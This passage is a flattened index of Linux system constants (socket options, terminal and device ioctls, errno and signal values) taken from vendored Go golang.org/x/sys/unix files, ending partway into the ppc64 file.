SO_ATTACH_REUSEPORT_EBPF = 0x34 constant SO_BINDTODEVICE (line 360) | SO_BINDTODEVICE = 0x19 constant SO_BINDTOIFINDEX (line 361) | SO_BINDTOIFINDEX = 0x3e constant SO_BPF_EXTENSIONS (line 362) | SO_BPF_EXTENSIONS = 0x30 constant SO_BROADCAST (line 363) | SO_BROADCAST = 0x6 constant SO_BSDCOMPAT (line 364) | SO_BSDCOMPAT = 0xe constant SO_BUF_LOCK (line 365) | SO_BUF_LOCK = 0x48 constant SO_BUSY_POLL (line 366) | SO_BUSY_POLL = 0x2e constant SO_BUSY_POLL_BUDGET (line 367) | SO_BUSY_POLL_BUDGET = 0x46 constant SO_CNX_ADVICE (line 368) | SO_CNX_ADVICE = 0x35 constant SO_COOKIE (line 369) | SO_COOKIE = 0x39 constant SO_DETACH_REUSEPORT_BPF (line 370) | SO_DETACH_REUSEPORT_BPF = 0x44 constant SO_DOMAIN (line 371) | SO_DOMAIN = 0x27 constant SO_DONTROUTE (line 372) | SO_DONTROUTE = 0x5 constant SO_ERROR (line 373) | SO_ERROR = 0x4 constant SO_INCOMING_CPU (line 374) | SO_INCOMING_CPU = 0x31 constant SO_INCOMING_NAPI_ID (line 375) | SO_INCOMING_NAPI_ID = 0x38 constant SO_KEEPALIVE (line 376) | SO_KEEPALIVE = 0x9 constant SO_LINGER (line 377) | SO_LINGER = 0xd constant SO_LOCK_FILTER (line 378) | SO_LOCK_FILTER = 0x2c constant SO_MARK (line 379) | SO_MARK = 0x24 constant SO_MAX_PACING_RATE (line 380) | SO_MAX_PACING_RATE = 0x2f constant SO_MEMINFO (line 381) | SO_MEMINFO = 0x37 constant SO_NETNS_COOKIE (line 382) | SO_NETNS_COOKIE = 0x47 constant SO_NOFCS (line 383) | SO_NOFCS = 0x2b constant SO_OOBINLINE (line 384) | SO_OOBINLINE = 0xa constant SO_PASSCRED (line 385) | SO_PASSCRED = 0x14 constant SO_PASSPIDFD (line 386) | SO_PASSPIDFD = 0x4c constant SO_PASSSEC (line 387) | SO_PASSSEC = 0x22 constant SO_PEEK_OFF (line 388) | SO_PEEK_OFF = 0x2a constant SO_PEERCRED (line 389) | SO_PEERCRED = 0x15 constant SO_PEERGROUPS (line 390) | SO_PEERGROUPS = 0x3b constant SO_PEERPIDFD (line 391) | SO_PEERPIDFD = 0x4d constant SO_PEERSEC (line 392) | SO_PEERSEC = 0x1f constant SO_PREFER_BUSY_POLL (line 393) | SO_PREFER_BUSY_POLL = 0x45 constant SO_PROTOCOL (line 394) | SO_PROTOCOL = 0x26 constant SO_RCVBUF (line 395) | SO_RCVBUF = 0x8 constant SO_RCVBUFFORCE (line 396) | SO_RCVBUFFORCE = 0x21 constant SO_RCVLOWAT (line 397) | SO_RCVLOWAT = 0x10 constant SO_RCVMARK (line 398) | SO_RCVMARK = 0x4b constant SO_RCVTIMEO (line 399) | SO_RCVTIMEO = 0x12 constant SO_RCVTIMEO_NEW (line 400) | SO_RCVTIMEO_NEW = 0x42 constant SO_RCVTIMEO_OLD (line 401) | SO_RCVTIMEO_OLD = 0x12 constant SO_RESERVE_MEM (line 402) | SO_RESERVE_MEM = 0x49 constant SO_REUSEADDR (line 403) | SO_REUSEADDR = 0x2 constant SO_REUSEPORT (line 404) | SO_REUSEPORT = 0xf constant SO_RXQ_OVFL (line 405) | SO_RXQ_OVFL = 0x28 constant SO_SECURITY_AUTHENTICATION (line 406) | SO_SECURITY_AUTHENTICATION = 0x16 constant SO_SECURITY_ENCRYPTION_NETWORK (line 407) | SO_SECURITY_ENCRYPTION_NETWORK = 0x18 constant SO_SECURITY_ENCRYPTION_TRANSPORT (line 408) | SO_SECURITY_ENCRYPTION_TRANSPORT = 0x17 constant SO_SELECT_ERR_QUEUE (line 409) | SO_SELECT_ERR_QUEUE = 0x2d constant SO_SNDBUF (line 410) | SO_SNDBUF = 0x7 constant SO_SNDBUFFORCE (line 411) | SO_SNDBUFFORCE = 0x20 constant SO_SNDLOWAT (line 412) | SO_SNDLOWAT = 0x11 constant SO_SNDTIMEO (line 413) | SO_SNDTIMEO = 0x13 constant SO_SNDTIMEO_NEW (line 414) | SO_SNDTIMEO_NEW = 0x43 constant SO_SNDTIMEO_OLD (line 415) | SO_SNDTIMEO_OLD = 0x13 constant SO_TIMESTAMPING (line 416) | SO_TIMESTAMPING = 0x25 constant SO_TIMESTAMPING_NEW (line 417) | SO_TIMESTAMPING_NEW = 0x41 constant SO_TIMESTAMPING_OLD (line 418) | SO_TIMESTAMPING_OLD = 0x25 constant SO_TIMESTAMPNS (line 419) | SO_TIMESTAMPNS = 0x23 constant SO_TIMESTAMPNS_NEW (line 420) | SO_TIMESTAMPNS_NEW = 0x40 constant SO_TIMESTAMPNS_OLD (line 421) | SO_TIMESTAMPNS_OLD = 0x23 constant SO_TIMESTAMP_NEW (line 422) | SO_TIMESTAMP_NEW = 0x3f constant SO_TXREHASH (line 423) | SO_TXREHASH = 0x4a constant SO_TXTIME (line 424) | SO_TXTIME = 0x3d constant SO_TYPE (line 425) | SO_TYPE = 0x3 constant SO_WIFI_STATUS (line 426) | SO_WIFI_STATUS = 0x29 constant SO_ZEROCOPY (line 427) | SO_ZEROCOPY = 0x3c constant TAB1 (line 428) | TAB1 = 0x400 constant TAB2 (line 429) | TAB2 = 0x800 constant TAB3 (line 430) | TAB3 = 0xc00 constant TABDLY (line 431) | TABDLY = 0xc00 constant TCFLSH (line 432) | TCFLSH = 0x2000741f constant TCGETA (line 433) | TCGETA = 0x40147417 constant TCGETS (line 434) | TCGETS = 0x402c7413 constant TCSAFLUSH (line 435) | TCSAFLUSH = 0x2 constant TCSBRK (line 436) | TCSBRK = 0x2000741d constant TCSBRKP (line 437) | TCSBRKP = 0x5425 constant TCSETA (line 438) | TCSETA = 0x80147418 constant TCSETAF (line 439) | TCSETAF = 0x8014741c constant TCSETAW (line 440) | TCSETAW = 0x80147419 constant TCSETS (line 441) | TCSETS = 0x802c7414 constant TCSETSF (line 442) | TCSETSF = 0x802c7416 constant TCSETSW (line 443) | TCSETSW = 0x802c7415 constant TCXONC (line 444) | TCXONC = 0x2000741e constant TFD_CLOEXEC (line 445) | TFD_CLOEXEC = 0x80000 constant TFD_NONBLOCK (line 446) | TFD_NONBLOCK = 0x800 constant TIOCCBRK (line 447) | TIOCCBRK = 0x5428 constant TIOCCONS (line 448) | TIOCCONS = 0x541d constant TIOCEXCL (line 449) | TIOCEXCL = 0x540c constant TIOCGDEV (line 450) | TIOCGDEV = 0x40045432 constant TIOCGETC (line 451) | TIOCGETC = 0x40067412 constant TIOCGETD (line 452) | TIOCGETD = 0x5424 constant TIOCGETP (line 453) | TIOCGETP = 0x40067408 constant TIOCGEXCL (line 454) | TIOCGEXCL = 0x40045440 constant TIOCGICOUNT (line 455) | TIOCGICOUNT = 0x545d constant TIOCGISO7816 (line 456) | TIOCGISO7816 = 0x40285442 constant TIOCGLCKTRMIOS (line 457) | TIOCGLCKTRMIOS = 0x5456 constant TIOCGLTC (line 458) | TIOCGLTC = 0x40067474 constant TIOCGPGRP (line 459) | TIOCGPGRP = 0x40047477 constant TIOCGPKT (line 460) | TIOCGPKT = 0x40045438 constant TIOCGPTLCK (line 461) | TIOCGPTLCK = 0x40045439 constant TIOCGPTN (line 462) | TIOCGPTN = 0x40045430 constant TIOCGPTPEER (line 463) | TIOCGPTPEER = 0x20005441 constant TIOCGRS485 (line 464) | TIOCGRS485 = 0x542e constant TIOCGSERIAL (line 465) | TIOCGSERIAL = 0x541e constant TIOCGSID (line 466) | TIOCGSID = 0x5429 constant TIOCGSOFTCAR (line 467) | TIOCGSOFTCAR = 0x5419 constant TIOCGWINSZ (line 468) | TIOCGWINSZ = 0x40087468 constant TIOCINQ (line 469) | TIOCINQ = 0x4004667f constant TIOCLINUX (line 470) | TIOCLINUX = 0x541c constant TIOCMBIC (line 471) | TIOCMBIC = 0x5417 constant TIOCMBIS (line 472) | TIOCMBIS = 0x5416 constant TIOCMGET (line 473) | TIOCMGET = 0x5415 constant TIOCMIWAIT (line 474) | TIOCMIWAIT = 0x545c constant TIOCMSET (line 475) | TIOCMSET = 0x5418 constant TIOCM_CAR (line 476) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 477) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 478) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 479) | TIOCM_DSR = 0x100 constant TIOCM_LOOP (line 480) | TIOCM_LOOP = 0x8000 constant TIOCM_OUT1 (line 481) | TIOCM_OUT1 = 0x2000 constant TIOCM_OUT2 (line 482) | TIOCM_OUT2 = 0x4000 constant TIOCM_RI (line 483) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 484) | TIOCM_RNG = 0x80 constant TIOCM_SR (line 485) | TIOCM_SR = 0x10 constant TIOCM_ST (line 486) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 487) | TIOCNOTTY = 0x5422 constant TIOCNXCL (line 488) | TIOCNXCL = 0x540d constant TIOCOUTQ (line 489) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 490) | TIOCPKT = 0x5420 constant TIOCSBRK (line 491) | TIOCSBRK = 0x5427 constant TIOCSCTTY (line 492) | TIOCSCTTY = 0x540e constant TIOCSERCONFIG (line 493) | TIOCSERCONFIG = 0x5453 constant TIOCSERGETLSR (line 494) | TIOCSERGETLSR = 0x5459 constant TIOCSERGETMULTI (line 495) | TIOCSERGETMULTI = 0x545a constant TIOCSERGSTRUCT (line 496) | TIOCSERGSTRUCT = 0x5458 constant TIOCSERGWILD (line 497) | TIOCSERGWILD = 0x5454 constant TIOCSERSETMULTI (line 498) | TIOCSERSETMULTI = 0x545b constant TIOCSERSWILD (line 499) | TIOCSERSWILD = 0x5455 constant TIOCSER_TEMT (line 500) | TIOCSER_TEMT = 0x1 constant TIOCSETC (line 501) | TIOCSETC = 0x80067411 constant TIOCSETD (line 502) | TIOCSETD = 0x5423 constant TIOCSETN (line 503) | TIOCSETN = 0x8006740a constant TIOCSETP (line 504) | TIOCSETP = 0x80067409 constant TIOCSIG (line 505) | TIOCSIG = 0x80045436 constant TIOCSISO7816 (line 506) | TIOCSISO7816 = 0xc0285443 constant TIOCSLCKTRMIOS (line 507) | TIOCSLCKTRMIOS = 0x5457 constant TIOCSLTC (line 508) | TIOCSLTC = 0x80067475 constant TIOCSPGRP (line 509) | TIOCSPGRP = 0x80047476 constant TIOCSPTLCK (line 510) | TIOCSPTLCK = 0x80045431 constant TIOCSRS485 (line 511) | TIOCSRS485 = 0x542f constant TIOCSSERIAL (line 512) | TIOCSSERIAL = 0x541f constant TIOCSSOFTCAR (line 513) | TIOCSSOFTCAR = 0x541a constant TIOCSTART (line 514) | TIOCSTART = 0x2000746e constant TIOCSTI (line 515) | TIOCSTI = 0x5412 constant TIOCSTOP (line 516) | TIOCSTOP = 0x2000746f constant TIOCSWINSZ (line 517) | TIOCSWINSZ = 0x80087467 constant TIOCVHANGUP (line 518) | TIOCVHANGUP = 0x5437 constant TOSTOP (line 519) | TOSTOP = 0x400000 constant TUNATTACHFILTER (line 520) | TUNATTACHFILTER = 0x800854d5 constant TUNDETACHFILTER (line 521) | TUNDETACHFILTER = 0x800854d6 constant TUNGETDEVNETNS (line 522) | TUNGETDEVNETNS = 0x200054e3 constant TUNGETFEATURES (line 523) | TUNGETFEATURES = 0x400454cf constant TUNGETFILTER (line 524) | TUNGETFILTER = 0x400854db constant TUNGETIFF (line 525) | TUNGETIFF = 0x400454d2 constant TUNGETSNDBUF (line 526) | TUNGETSNDBUF = 0x400454d3 constant TUNGETVNETBE (line 527) | TUNGETVNETBE = 0x400454df constant TUNGETVNETHDRSZ (line 528) | TUNGETVNETHDRSZ = 0x400454d7 constant TUNGETVNETLE (line 529) | TUNGETVNETLE = 0x400454dd constant TUNSETCARRIER (line 530) | TUNSETCARRIER = 0x800454e2 constant TUNSETDEBUG (line 531) | TUNSETDEBUG = 0x800454c9 constant TUNSETFILTEREBPF (line 532) | TUNSETFILTEREBPF = 0x400454e1 constant TUNSETGROUP (line 533) | TUNSETGROUP = 0x800454ce constant TUNSETIFF (line 534) | TUNSETIFF = 0x800454ca constant TUNSETIFINDEX (line 535) | TUNSETIFINDEX = 0x800454da constant TUNSETLINK (line 536) | TUNSETLINK = 0x800454cd constant TUNSETNOCSUM (line 537) | TUNSETNOCSUM = 0x800454c8 constant TUNSETOFFLOAD (line 538) | TUNSETOFFLOAD = 0x800454d0 constant TUNSETOWNER (line 539) | TUNSETOWNER = 0x800454cc constant TUNSETPERSIST (line 540) | TUNSETPERSIST = 0x800454cb constant TUNSETQUEUE (line 541) | TUNSETQUEUE = 0x800454d9 constant TUNSETSNDBUF (line 542) | TUNSETSNDBUF = 0x800454d4 constant TUNSETSTEERINGEBPF (line 543) | TUNSETSTEERINGEBPF = 0x400454e0 constant TUNSETTXFILTER (line 544) | TUNSETTXFILTER = 0x800454d1 constant TUNSETVNETBE (line 545) | TUNSETVNETBE = 0x800454de constant TUNSETVNETHDRSZ (line 546) | TUNSETVNETHDRSZ = 0x800454d8 constant TUNSETVNETLE (line 547) | TUNSETVNETLE = 0x800454dc constant UBI_IOCATT (line 548) | UBI_IOCATT = 0x80186f40 constant UBI_IOCDET (line 549) | UBI_IOCDET = 0x80046f41 constant UBI_IOCEBCH (line 550) | UBI_IOCEBCH = 0x80044f02 constant UBI_IOCEBER (line 551) | UBI_IOCEBER = 0x80044f01 constant UBI_IOCEBISMAP (line 552) | UBI_IOCEBISMAP = 0x40044f05 constant UBI_IOCEBMAP (line 553) | UBI_IOCEBMAP = 0x80084f03 constant UBI_IOCEBUNMAP (line 554) | UBI_IOCEBUNMAP = 0x80044f04 constant UBI_IOCMKVOL (line 555) | UBI_IOCMKVOL = 0x80986f00 constant UBI_IOCRMVOL (line 556) | UBI_IOCRMVOL = 0x80046f01 constant UBI_IOCRNVOL (line 557) | UBI_IOCRNVOL = 0x91106f03 constant UBI_IOCRPEB (line 558) | UBI_IOCRPEB = 0x80046f04 constant UBI_IOCRSVOL (line 559) | UBI_IOCRSVOL = 0x800c6f02 constant UBI_IOCSETVOLPROP (line 560) | UBI_IOCSETVOLPROP = 0x80104f06 constant UBI_IOCSPEB (line 561) | UBI_IOCSPEB = 0x80046f05 constant UBI_IOCVOLCRBLK (line 562) | UBI_IOCVOLCRBLK = 0x80804f07 constant UBI_IOCVOLRMBLK (line 563) | UBI_IOCVOLRMBLK = 0x20004f08 constant UBI_IOCVOLUP (line 564) | UBI_IOCVOLUP = 0x80084f00 constant VDISCARD (line 565) | VDISCARD = 0x10 constant VEOF (line 566) | VEOF = 0x4 constant VEOL (line 567) | VEOL = 0x6 constant VEOL2 (line 568) | VEOL2 = 0x8 constant VMIN (line 569) | VMIN = 0x5 constant VREPRINT (line 570) | VREPRINT = 0xb constant VSTART (line 571) | VSTART = 0xd constant VSTOP (line 572) | VSTOP = 0xe constant VSUSP (line 573) | VSUSP = 0xc constant VSWTC (line 574) | VSWTC = 0x9 constant VT1 (line 575) | VT1 = 0x10000 constant VTDLY (line 576) | VTDLY = 0x10000 constant VTIME (line 577) | VTIME = 0x7 constant VWERASE (line 578) | VWERASE = 0xa constant WDIOC_GETBOOTSTATUS (line 579) | WDIOC_GETBOOTSTATUS = 0x40045702 constant WDIOC_GETPRETIMEOUT (line 580) | WDIOC_GETPRETIMEOUT = 0x40045709 constant WDIOC_GETSTATUS (line 581) | WDIOC_GETSTATUS = 0x40045701 constant WDIOC_GETSUPPORT (line 582) | WDIOC_GETSUPPORT = 0x40285700 constant WDIOC_GETTEMP (line 583) | WDIOC_GETTEMP = 0x40045703 constant WDIOC_GETTIMELEFT (line 584) | WDIOC_GETTIMELEFT = 0x4004570a constant WDIOC_GETTIMEOUT (line 585) | WDIOC_GETTIMEOUT = 0x40045707 constant WDIOC_KEEPALIVE (line 586) | WDIOC_KEEPALIVE = 0x40045705 constant WDIOC_SETOPTIONS (line 587) | WDIOC_SETOPTIONS = 0x40045704 constant WORDSIZE (line 588) | WORDSIZE = 0x20 constant XCASE (line 589) | XCASE = 0x4000 constant XTABS (line 590) | XTABS = 0xc00 constant _HIDIOCGRAWNAME (line 591) | _HIDIOCGRAWNAME = 0x40804804 constant _HIDIOCGRAWPHYS (line 592) | _HIDIOCGRAWPHYS = 0x40404805 constant _HIDIOCGRAWUNIQ (line 593) | _HIDIOCGRAWUNIQ = 0x40404808 constant EADDRINUSE (line 598) | EADDRINUSE = syscall.Errno(0x62) constant EADDRNOTAVAIL (line 599) | EADDRNOTAVAIL = syscall.Errno(0x63) constant EADV (line 600) | EADV = syscall.Errno(0x44) constant EAFNOSUPPORT (line 601) | EAFNOSUPPORT = syscall.Errno(0x61) constant EALREADY (line 602) | EALREADY = syscall.Errno(0x72) constant EBADE (line 603) | EBADE = syscall.Errno(0x34) constant EBADFD (line 604) | EBADFD = syscall.Errno(0x4d) constant EBADMSG (line 605) | EBADMSG = syscall.Errno(0x4a) constant EBADR (line 606) | EBADR = syscall.Errno(0x35) constant EBADRQC (line 607) | EBADRQC = syscall.Errno(0x38) constant EBADSLT (line 608) | EBADSLT = syscall.Errno(0x39) constant EBFONT (line 609) | EBFONT = syscall.Errno(0x3b) constant ECANCELED (line 610) | ECANCELED = syscall.Errno(0x7d) constant ECHRNG (line 611) | ECHRNG = syscall.Errno(0x2c) constant ECOMM (line 612) | ECOMM = syscall.Errno(0x46) constant ECONNABORTED (line 613) | ECONNABORTED = syscall.Errno(0x67) constant ECONNREFUSED (line 614) | ECONNREFUSED = syscall.Errno(0x6f) constant ECONNRESET (line 615) | ECONNRESET = syscall.Errno(0x68) constant EDEADLK (line 616) | EDEADLK = syscall.Errno(0x23) constant EDEADLOCK (line 617) | EDEADLOCK = syscall.Errno(0x3a) constant EDESTADDRREQ (line 618) | EDESTADDRREQ = syscall.Errno(0x59) constant EDOTDOT (line 619) | EDOTDOT = syscall.Errno(0x49) constant EDQUOT (line 620) | EDQUOT = syscall.Errno(0x7a) constant EHOSTDOWN (line 621) | EHOSTDOWN = syscall.Errno(0x70) constant EHOSTUNREACH (line 622) | EHOSTUNREACH = syscall.Errno(0x71) constant EHWPOISON (line 623) | EHWPOISON = syscall.Errno(0x85) constant EIDRM (line 624) | EIDRM = syscall.Errno(0x2b) constant EILSEQ (line 625) | EILSEQ = syscall.Errno(0x54) constant EINPROGRESS (line 626) | EINPROGRESS = syscall.Errno(0x73) constant EISCONN (line 627) | EISCONN = syscall.Errno(0x6a) constant EISNAM (line 628) | EISNAM = syscall.Errno(0x78) constant EKEYEXPIRED (line 629) | EKEYEXPIRED = syscall.Errno(0x7f) constant EKEYREJECTED (line 630) | EKEYREJECTED = syscall.Errno(0x81) constant EKEYREVOKED (line 631) | EKEYREVOKED = syscall.Errno(0x80) constant EL2HLT (line 632) | EL2HLT = syscall.Errno(0x33) constant EL2NSYNC (line 633) | EL2NSYNC = syscall.Errno(0x2d) constant EL3HLT (line 634) | EL3HLT = syscall.Errno(0x2e) constant EL3RST (line 635) | EL3RST = syscall.Errno(0x2f) constant ELIBACC (line 636) | ELIBACC = syscall.Errno(0x4f) constant ELIBBAD (line 637) | ELIBBAD = syscall.Errno(0x50) constant ELIBEXEC (line 638) | ELIBEXEC = syscall.Errno(0x53) constant ELIBMAX (line 639) | ELIBMAX = syscall.Errno(0x52) constant ELIBSCN (line 640) | ELIBSCN = syscall.Errno(0x51) constant ELNRNG (line 641) | ELNRNG = syscall.Errno(0x30) constant ELOOP (line 642) | ELOOP = syscall.Errno(0x28) constant EMEDIUMTYPE (line 643) | EMEDIUMTYPE = syscall.Errno(0x7c) constant EMSGSIZE (line 644) | EMSGSIZE = syscall.Errno(0x5a) constant EMULTIHOP (line 645) | EMULTIHOP = syscall.Errno(0x48) constant ENAMETOOLONG (line 646) | ENAMETOOLONG = syscall.Errno(0x24) constant ENAVAIL (line 647) | ENAVAIL = syscall.Errno(0x77) constant ENETDOWN (line 648) | ENETDOWN = syscall.Errno(0x64) constant ENETRESET (line 649) | ENETRESET = syscall.Errno(0x66) constant ENETUNREACH (line 650) | ENETUNREACH = syscall.Errno(0x65) constant ENOANO (line 651) | ENOANO = syscall.Errno(0x37) constant ENOBUFS (line 652) | ENOBUFS = syscall.Errno(0x69) constant ENOCSI (line 653) | ENOCSI = syscall.Errno(0x32) constant ENODATA (line 654) | ENODATA = syscall.Errno(0x3d) constant ENOKEY (line 655) | ENOKEY = syscall.Errno(0x7e) constant ENOLCK (line 656) | ENOLCK = syscall.Errno(0x25) constant ENOLINK (line 657) | ENOLINK = syscall.Errno(0x43) constant ENOMEDIUM (line 658) | ENOMEDIUM = syscall.Errno(0x7b) constant ENOMSG (line 659) | ENOMSG = syscall.Errno(0x2a) constant ENONET (line 660) | ENONET = syscall.Errno(0x40) constant ENOPKG (line 661) | ENOPKG = syscall.Errno(0x41) constant ENOPROTOOPT (line 662) | ENOPROTOOPT = syscall.Errno(0x5c) constant ENOSR (line 663) | ENOSR = syscall.Errno(0x3f) constant ENOSTR (line 664) | ENOSTR = syscall.Errno(0x3c) constant ENOSYS (line 665) | ENOSYS = syscall.Errno(0x26) constant ENOTCONN (line 666) | ENOTCONN = syscall.Errno(0x6b) constant ENOTEMPTY (line 667) | ENOTEMPTY = syscall.Errno(0x27) constant ENOTNAM (line 668) | ENOTNAM = syscall.Errno(0x76) constant ENOTRECOVERABLE (line 669) | ENOTRECOVERABLE = syscall.Errno(0x83) constant ENOTSOCK (line 670) | ENOTSOCK = syscall.Errno(0x58) constant ENOTSUP (line 671) | ENOTSUP = syscall.Errno(0x5f) constant ENOTUNIQ (line 672) | ENOTUNIQ = syscall.Errno(0x4c) constant EOPNOTSUPP (line 673) | EOPNOTSUPP = syscall.Errno(0x5f) constant EOVERFLOW (line 674) | EOVERFLOW = syscall.Errno(0x4b) constant EOWNERDEAD (line 675) | EOWNERDEAD = syscall.Errno(0x82) constant EPFNOSUPPORT (line 676) | EPFNOSUPPORT = syscall.Errno(0x60) constant EPROTO (line 677) | EPROTO = syscall.Errno(0x47) constant EPROTONOSUPPORT (line 678) | EPROTONOSUPPORT = syscall.Errno(0x5d) constant EPROTOTYPE (line 679) | EPROTOTYPE = syscall.Errno(0x5b) constant EREMCHG (line 680) | EREMCHG = syscall.Errno(0x4e) constant EREMOTE (line 681) | EREMOTE = syscall.Errno(0x42) constant EREMOTEIO (line 682) | EREMOTEIO = syscall.Errno(0x79) constant ERESTART (line 683) | ERESTART = syscall.Errno(0x55) constant ERFKILL (line 684) | ERFKILL = syscall.Errno(0x84) constant ESHUTDOWN (line 685) | ESHUTDOWN = syscall.Errno(0x6c) constant ESOCKTNOSUPPORT (line 686) | ESOCKTNOSUPPORT = syscall.Errno(0x5e) constant ESRMNT (line 687) | ESRMNT = syscall.Errno(0x45) constant ESTALE (line 688) | ESTALE = syscall.Errno(0x74) constant ESTRPIPE (line 689) | ESTRPIPE = syscall.Errno(0x56) constant ETIME (line 690) | ETIME = syscall.Errno(0x3e) constant ETIMEDOUT (line 691) | ETIMEDOUT = syscall.Errno(0x6e) constant ETOOMANYREFS (line 692) | ETOOMANYREFS = syscall.Errno(0x6d) constant EUCLEAN (line 693) | EUCLEAN = syscall.Errno(0x75) constant EUNATCH (line 694) | EUNATCH = syscall.Errno(0x31) constant EUSERS (line 695) | EUSERS = syscall.Errno(0x57) constant EXFULL (line 696) | EXFULL = syscall.Errno(0x36) constant SIGBUS (line 701) | SIGBUS = syscall.Signal(0x7) constant SIGCHLD (line 702) | SIGCHLD = syscall.Signal(0x11) constant SIGCLD (line 703) | SIGCLD = syscall.Signal(0x11) constant SIGCONT (line 704) | SIGCONT = syscall.Signal(0x12) constant SIGIO (line 705) | SIGIO = syscall.Signal(0x1d) constant SIGPOLL (line 706) | SIGPOLL = syscall.Signal(0x1d) constant SIGPROF (line 707) | SIGPROF = syscall.Signal(0x1b) constant SIGPWR (line 708) | SIGPWR = syscall.Signal(0x1e) constant SIGSTKFLT (line 709) | SIGSTKFLT = syscall.Signal(0x10) constant SIGSTOP (line 710) | SIGSTOP = syscall.Signal(0x13) constant SIGSYS (line 711) | SIGSYS = syscall.Signal(0x1f) constant SIGTSTP (line 712) | SIGTSTP = syscall.Signal(0x14) constant SIGTTIN (line 713) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 714) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 715) | SIGURG = syscall.Signal(0x17) constant SIGUSR1 (line 716) | SIGUSR1 = syscall.Signal(0xa) constant SIGUSR2 (line 717) | SIGUSR2 = syscall.Signal(0xc) constant SIGVTALRM (line 718) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 719) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 720) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 721) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_linux_ppc64.go constant B1000000 (line 14) | B1000000 = 0x17 constant B115200 (line 15) | B115200 = 0x11 constant B1152000 (line 16) | B1152000 = 0x18 constant B1500000 (line 17) | B1500000 = 0x19 constant B2000000 (line 18) | B2000000 = 0x1a constant B230400 (line 19) | B230400 = 0x12 constant B2500000 (line 20) | B2500000 = 0x1b constant B3000000 (line 21) | B3000000 = 0x1c constant B3500000 (line 22) | B3500000 = 0x1d constant B4000000 (line 23) | B4000000 = 0x1e constant B460800 (line 24) | B460800 = 0x13 constant B500000 (line 25) | B500000 = 0x14 constant B57600 (line 26) | B57600 = 0x10 constant B576000 (line 27) | B576000 = 0x15 constant B921600 (line 28) | B921600 = 0x16 constant BLKALIGNOFF (line 29) | BLKALIGNOFF = 0x2000127a constant BLKBSZGET (line 30) | BLKBSZGET = 0x40081270 constant BLKBSZSET (line 31) | BLKBSZSET = 0x80081271 constant BLKDISCARD (line 32) | BLKDISCARD = 0x20001277 constant BLKDISCARDZEROES (line 33) | BLKDISCARDZEROES = 0x2000127c constant BLKFLSBUF (line 34) | BLKFLSBUF = 0x20001261 constant BLKFRAGET (line 35) | BLKFRAGET = 0x20001265 constant BLKFRASET (line 36) | BLKFRASET = 0x20001264 constant BLKGETDISKSEQ (line 37) | BLKGETDISKSEQ = 0x40081280 constant BLKGETSIZE (line 38) | BLKGETSIZE = 0x20001260 constant BLKGETSIZE64 (line 39) | BLKGETSIZE64 = 0x40081272 constant BLKIOMIN (line 40) | BLKIOMIN = 0x20001278 constant BLKIOOPT (line 41) | BLKIOOPT = 0x20001279 constant BLKPBSZGET (line 42) | BLKPBSZGET = 0x2000127b constant BLKRAGET (line 43) | BLKRAGET = 0x20001263 constant BLKRASET (line 44) | BLKRASET = 0x20001262 constant BLKROGET (line 45) | BLKROGET = 0x2000125e constant BLKROSET (line 46) | BLKROSET = 0x2000125d constant BLKROTATIONAL (line 47) | BLKROTATIONAL = 0x2000127e constant BLKRRPART (line 48) | BLKRRPART = 0x2000125f constant BLKSECDISCARD (line 49) | BLKSECDISCARD = 0x2000127d constant BLKSECTGET (line 50) | BLKSECTGET = 0x20001267 constant BLKSECTSET (line 51) | BLKSECTSET = 0x20001266 constant BLKSSZGET (line 52) | BLKSSZGET = 0x20001268 constant BLKZEROOUT (line 53) | BLKZEROOUT = 0x2000127f constant BOTHER (line 54) | BOTHER = 0x1f constant BS1 (line 55) | BS1 = 0x8000 constant BSDLY (line 56) | BSDLY = 0x8000 constant CBAUD (line 57) | CBAUD = 0xff constant CBAUDEX (line 58) | CBAUDEX = 0x0 constant CIBAUD (line 59) | CIBAUD = 0xff0000 constant CLOCAL (line 60) | CLOCAL = 0x8000 constant CR1 (line 61) | CR1 = 0x1000 constant CR2 (line 62) | CR2 = 0x2000 constant CR3 (line 63) | CR3 = 0x3000 constant CRDLY (line 64) | CRDLY = 0x3000 constant CREAD (line 65) | CREAD = 0x800 constant CS6 (line 66) | CS6 = 0x100 constant CS7 (line 67) | CS7 = 0x200 constant CS8 (line 68) | CS8 = 0x300 constant CSIZE (line 69) | CSIZE = 0x300 constant CSTOPB (line 70) | CSTOPB = 0x400 constant ECCGETLAYOUT (line 71) | ECCGETLAYOUT = 0x41484d11 constant ECCGETSTATS (line 72) | ECCGETSTATS = 0x40104d12 constant ECHOCTL (line 73) | ECHOCTL = 0x40 constant ECHOE (line 74) | ECHOE = 0x2 constant ECHOK (line 75) | ECHOK = 0x4 constant ECHOKE (line 76) | ECHOKE = 0x1 constant ECHONL (line 77) | ECHONL = 0x10 constant ECHOPRT (line 78) | ECHOPRT = 0x20 constant EFD_CLOEXEC (line 79) | EFD_CLOEXEC = 0x80000 constant EFD_NONBLOCK (line 80) | EFD_NONBLOCK = 0x800 constant EPOLL_CLOEXEC (line 81) | EPOLL_CLOEXEC = 0x80000 constant EXTPROC (line 82) | EXTPROC = 0x10000000 constant FF1 (line 83) | FF1 = 0x4000 constant FFDLY (line 84) | FFDLY = 0x4000 constant FICLONE (line 85) | FICLONE = 0x80049409 constant FICLONERANGE (line 86) | FICLONERANGE = 0x8020940d constant FLUSHO (line 87) | FLUSHO = 0x800000 constant FS_IOC_ENABLE_VERITY (line 88) | FS_IOC_ENABLE_VERITY = 0x80806685 constant FS_IOC_GETFLAGS (line 89) | FS_IOC_GETFLAGS = 0x40086601 constant FS_IOC_GET_ENCRYPTION_NONCE (line 90) | FS_IOC_GET_ENCRYPTION_NONCE = 0x4010661b constant FS_IOC_GET_ENCRYPTION_POLICY (line 91) | FS_IOC_GET_ENCRYPTION_POLICY = 0x800c6615 constant FS_IOC_GET_ENCRYPTION_PWSALT (line 92) | FS_IOC_GET_ENCRYPTION_PWSALT = 0x80106614 constant FS_IOC_SETFLAGS (line 93) | FS_IOC_SETFLAGS = 0x80086602 constant 